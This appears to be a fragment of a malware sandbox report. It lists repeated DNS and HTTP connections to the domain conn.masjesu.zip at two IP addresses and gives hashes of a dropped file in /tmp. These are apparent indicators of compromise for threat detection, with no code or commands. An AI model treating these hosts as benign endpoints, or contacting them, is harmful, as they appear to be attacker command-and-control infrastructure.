| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |